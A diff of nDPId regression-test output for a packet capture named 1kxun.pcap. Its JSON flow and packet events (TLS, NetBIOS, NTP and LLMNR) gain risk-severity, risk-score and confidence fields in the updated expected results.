 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"}
-00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1470104424738,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104424738,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6MAAIARUUPAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1470104425455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104425455,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6QAAIARUULAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="}
 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1470104425762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"ts_msec":1470104425762,"pkt":"\/\/\/\/\/\/\/\/wKC7c+snCABFAAFZOwBAAEARM+XAqAoH\/\/\/\/\/\/YA9gABRUMe\/\/+fLaAAwKC7c+snwKgKBwAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+snQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDIzAAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqAoH\/\/8AAFBvcnQgOAAAAAAAAAAAAAAAAAAAAAAAAAA="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1470104426276,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104426276,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6UAAIARUUHAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1470104426973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1470104426973,"pkt":"TF4M6gNlYMVHBbyMCABFwABMyLEAAEARvv3AqAUQEf0afQB7AHsAOHvnIwIG7AAAJiAAAPbJEf0afdtKfo89Puc520qBhKZDx2jbSoGEtCSHfttKgew\/d58s"}
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"},"ntp": {"request_code":0,"version":0}}
+00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1470104426992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"ts_msec":1470104426992,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQAD3zwU6wAi91hE5AAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1470104427094,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"ts_msec":1470104427094,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQAD3zwU6wAi91hE5AAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1470104427094,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104427094,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fkcAAAERlKLAqAUp4AAA\/NkpFOsAIt1BROQAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1470104429964,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104429964,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MWEAAAER4XjAqAU54AAA\/PusFOsAIt9AFnIAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1470104430064,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"ts_msec":1470104430064,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQAD3zcU6wAl4fcCawAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1470104430065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1470104430065,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8AAAAERxx3AqAUy4AAA\/N83FOsAJVssAmsAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1470104430065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104430065,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MWMAAAER4XbAqAU54AAA\/PusFOsAIt9AFnIAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="}
